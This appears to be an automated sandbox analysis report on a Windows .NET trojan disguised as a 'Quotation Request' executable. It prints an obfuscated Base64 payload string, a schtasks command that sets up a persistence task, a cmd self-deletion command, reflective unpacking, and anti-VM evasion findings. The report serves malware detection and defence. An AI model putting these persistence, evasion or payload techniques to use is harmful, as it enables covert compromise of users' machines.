          Source: 0.0.Quotation Reques.exe.90000.0.unpack, LogIn.csBase64 encoded string: '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
          Source: 6.2.Quotation Reques.exe.660000.1.unpack, LogIn.csBase64 encoded string: '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
          Source: 6.0.Quotation Reques.exe.660000.0.unpack, LogIn.csBase64 encoded string: 'GIdDNNZNNNNRNNNN//8NNYtNNNNNNNNNDNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNtNNNNN4sht4NgNaAVotOGZ0uITucplOjpz9apzSgVTAuoz5iqPOvMFOlqJ4tnJ4tER9GVT1iMTHhQD0XWNNNNNNNNNODEDNNGNRQNViu868NNNNNNNNNNBNNNvRYNINNNPNNNNNTNNNNNNNNlw8NNNNtNNNNDNNNNNNNRDNtNNNNNtNNONNNNNNNNNNRNNNNNNNNNNPNNNNNNtNNNNNNNNZNDVHNNONNNONNNNNNRNNNRNNNNNNNNONNNNNNNNNNNNNNNUt/NNOCNNNNNRNNNBDQNNNNNNNNNNNNNNNNNNNNNNNNNTNNNNjNNNOpCjNNUNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNVNNNPNNNNNNNNNNNNNNNPPNNNRtNNNNNNNNNNNNNNP50MKu0NNNN0O8NNNNtNNNNVNNNNNVNNNNNNNNNNNNNNNNNNPNNNTNhpaAlLjNNNBDQNNNNDNNNNNDNNNNvNNNNNNNNNNNNNNNNNNONNNONYaWyoT9wNNNZNNNNNTNNNNNPNNNNWtNNNNNNNNNNNNNNNNNNDNNNDtNNNNNNNNNNNNNNNNNNNNPfCjNNNNNNNRtNNNNPNNHNhPHNNBjLNNNQNNNNNNNNNXD+NNP4NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNO4PXOLNNNbdWtNPXOpNNNbNXdMmTNNNPbNONNNRpkxNNNdNNtNNOUZnNNNXtNZNNNEmTjNNPbNRNNNRXuZjNDNDNNNNNDNNRDO+NDNNOT8pNNNXPvfNOvbGZNRNRNNNNNVNNORNstVNNNEiUDNNPtbeNNLdRmNONONNNNNQNNNENU4QNNNRok4NNNbXXjNTXuZjNDNDNNNNONNNRDO+ONNNOT8sNNNXPvfNOvbGZNVNCNNNNNHNNORNstHNNNDHXPNNNNbYOljuptRNNUQDODNNNvtuNNNXolVNNNcmVjNNPtjVtNHNNNDNNU4SNNNRPvfNOvbGZNRNPjNNNNLNNORNstLNNNDXXjNTXvVNNbNTNNNRXyMmQNNNOvtxNNNXqNLNNNXNOjNNOPbrNvtyNNNXXtNNRmNONNfNNNNUNNNENU4UNNNRPvfNOvbNRmNONNfNNNNUNNNENPtANNNTPvfNOvc+pwfNNUPNPNNNOUV7NNOjtNxNNNElBjNNpVNXNNNRXxbNNvtzNNNXNNZROFtENNNTNPbNNOZjONO0NNNNPNNNRDOmWjNNPtbTVYvPNDNtXWbONT8bNNNXXPxNNNbNNvtINNNTOPtHNNNTPjpbRjNNOtZbSDNNOvtFNNNTQNtbXtNNPt0WolfNNNbqzuZRRDEiYNNNPuhnRjHEOKV9NNOjTOvAStNNNFtgNNNXWuLbYtNNPtNdRmNSNWpNNNNWNNNENPtiNNNXN28jNNNXPjVPwzxK2cRspTRZNb5cS9LK2usJwF8NNNRANb5cS9bGOORRRjHJRjLeBtxEOtVEOcRVLDpEO5SugWjEOjAiZDNNPusn/tRGPORVRjxEPFjTSuZUNPfVNORUS9LGOjNEOusJRjLEOuRSZpNWNb5cTAbK1usnS9nAYjNNNFtlNNNXqNHNNOfXXjNTXtNGZNHNctNNNNbNNORNStfPomZNNNbGOkVUXQDNNNbZPNwLTgtAPEsnS9nAYjNNNEZRPOsnRjtJRjxeDjtK2uZXSuZYXl0PRDxEP281NNNXRjjFQPt2NNNXXQpNNNbJRDDUTvt4NNNXNNpn1tfEPksJRjfEPkRXZp0EPEsJRjxEPERVZopEOOLbBDNNPuZSRDHK2usJwF8NNNRGOuRRTuRTSuRTwzxbBNNNPtNEOtbeNNLdNNNGZNVNXNNNNNfNNORNN3WYNNOjXQbNNNbbBjNNPaZwNNNXPjpPomjNNNc0VtNNNDbeNNLdRmNRNRbNNNNZNNNENNWiZDNNPuuopm0NNNbYNz8kNNNXTAbZSt0eUjpPPEuiCtNNPu8DXQ8NNNbbDNNNPz9ONNNXWtxL1t0WPQUqO29PNNNXPvfNOvbNNOZjNDNUNNNNQDNNRDNHPvfNOvcTNNVJztVKztVLzvtENNNTNPbNNNNGZNZNVNNNNN4NNORNsttNNNE+PDNNOU4XNNNRXORNNNLNpwfNNUNXXjNTXuZjNtNFNNNNQjNNRDNPNluQNNNXXRDNNNbXXjNTXtNNRmNONNjNNNNDNNNENNVbEDNNPtbeNNLdRmNONONNNNNENNNENANWNNNPXPRNNNbXXjNTXuZjNDNZNNNNQtNNRDNPXRLNNNbXXjNTXuZjNtNqNNNNRtNNRDNPwNLNNOfH/tRYOljVXNRNNPfXXjHNNtbeNNLdWtNQ/uHTNNNoXvLNNvtzNNNXNPbNNNNGZNVNADNNNOZNNORNNagVNNNXo0xNNNbYO4jWNNNoSC4OQNtfSPtPNNNePjW7FNNNPtqiFtNNPtNNNNpXXjNTXyVNNvtzNNNXNNWmFjNNPa1VNNNXXv4bTNNNObNZNNNRXu4PXPLNNNbdNNOPH0cPNDNONNNNNNNZNNNNqwVhZP41ZQplAjNNNNNSNTjNNNPbPDNNV34NNODXNNOjPDNNV1A0pzyhM3ZNNNNNuOZNNTDNNNNwIIZN6OZNNONNNNNwE1IWENNNNCtGNNQ0ONNNV0Wfo2VNNNNNNNNNNtNNNIpIbtxWQjNNNCbOZjNJNNNONNNNBDNNNNfNNNNZNNNNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/4@14/7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038C5CA _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,GetLastError,GetLastError,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,EnterCriticalSection,LeaveCriticalSection,exit,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003AA0D2 memset,GetDiskFreeSpaceExW,??_V@YAXPAX@Z,
          Source: C:\Users\user\Desktop\Quotation Reques.exeFile created: C:\Users\user\AppData\Roaming\ftkqUsB.exeJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6752:120:WilError_01
          Source: C:\Users\user\Desktop\Quotation Reques.exeFile created: C:\Users\user\AppData\Local\Temp\tmp1923.tmpJump to behavior
          Source: Quotation Reques.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Quotation Reques.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Quotation Reques.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Quotation Reques.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: Quotation Reques.exeVirustotal: Detection: 26%
          Source: Quotation Reques.exeReversingLabs: Detection: 34%
          Source: C:\Users\user\Desktop\Quotation Reques.exeFile read: C:\Users\user\Desktop\Quotation Reques.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Quotation Reques.exe 'C:\Users\user\Desktop\Quotation Reques.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Users\user\Desktop\Quotation Reques.exe C:\Users\user\Desktop\Quotation Reques.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Quotation Reques.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp'
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess created: C:\Users\user\Desktop\Quotation Reques.exe C:\Users\user\Desktop\Quotation Reques.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Quotation Reques.exe'
          Source: C:\Users\user\Desktop\Quotation Reques.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\Quotation Reques.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Quotation Reques.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Quotation Reques.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: Quotation Reques.exe, 00000006.00000002.299728528.000000000126F000.00000040.00000001.sdmp, cmd.exe, 00000010.00000002.494308304.00000000030AF000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: Quotation Reques.exe, 00000006.00000002.300094599.0000000002D10000.00000040.00000001.sdmp, cmd.exe, 00000010.00000002.490096400.0000000000380000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Quotation Reques.exe, cmd.exe
          Source: Binary string: cmd.pdb source: Quotation Reques.exe, 00000006.00000002.300094599.0000000002D10000.00000040.00000001.sdmp, cmd.exe

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: Quotation Reques.exe, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: ftkqUsB.exe.0.dr, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.Quotation Reques.exe.90000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.Quotation Reques.exe.90000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.2.Quotation Reques.exe.660000.1.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.Quotation Reques.exe.660000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041B3C5 push eax; ret
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041B47C push eax; ret
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041B412 push eax; ret
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041B41B push eax; ret
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041363A push 2B6D3EBBh; ret
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011CD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003976BD push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003976D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0300D0D1 push ecx; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.41809908536
          Source: initial sampleStatic PE information: section name: .text entropy: 7.41809908536
          Source: C:\Users\user\Desktop\Quotation Reques.exeFile created: C:\Users\user\AppData\Roaming\ftkqUsB.exeJump to dropped file

          Boot Survival:

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp'
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.252016521.00000000025CB000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Quotation Reques.exe PID: 6476, type: MEMORY
          Source: Yara matchFile source: 0.2.Quotation Reques.exe.25b68bc.1.raw.unpack, type: UNPACKEDPE
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
